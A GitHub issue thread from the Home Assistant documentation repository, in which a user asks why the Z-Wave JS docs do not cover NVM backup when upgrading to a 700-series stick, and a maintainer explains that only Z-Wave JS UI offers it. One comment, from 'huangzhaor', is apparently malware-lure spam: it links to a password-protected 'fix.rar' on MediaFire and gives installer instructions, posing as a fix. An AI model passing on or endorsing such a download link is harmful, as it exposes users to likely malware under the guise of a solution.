### ISSUE TITLE
NVM backup - all over the forum/Discord, but nowhwere in the docs?

### ISSUE THREAD

**Issue by amuir2k** [home-assistant/home-assistant.github.io#34452]
### Feedback

I'm trying to upgrade from a Aeotec 500 to 700 series and multiple places in the forum and Discord tell me I need to do a NVM backup and then restore that to the new Z-stick, but I can not find any reference to NVM or even backup in the docs (other than backing up the keys). It would be great if this was documented, and it if it is already documented, then it would be great if it was more "findable"

### URL

https://www.home-assistant.io/integrations/zwave_js/

### Version

2024.8.2

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by raman325** [comment]
The Home Assistant integration for zwave currently doesn't support NVM backups or restores which is why they are not included in our docs. Any instructions to backup or restore an NVM likely involve Z-Wave JS UI because that's the only place that exposes that functionality at the moment as far as I am aware. If any documentation is needed, it should go into the Z-Wave JS UI docs. It may also be an appropriate community guide topic on the HA community forums, but it won't get added to the integration documentation unless we add the capability within HA itself

**Comment by amuir2k** [comment]
Hi, thanks for clarifying.  I think the fact that the Z-Wave addon and the Z-Wave JS UI are so closely named that it causes this confusion for new users.  I finally understood after a reply was posted in the Discourse channel that said essentially the same thing and pointed me to the Z-Wave JS UI install.  I have that running now and have added the NVM backup to cron.  It would be great if there were a sticky post or something (Guideline for top 10 points of confusion for new users?) that made the difference between the two more clear.
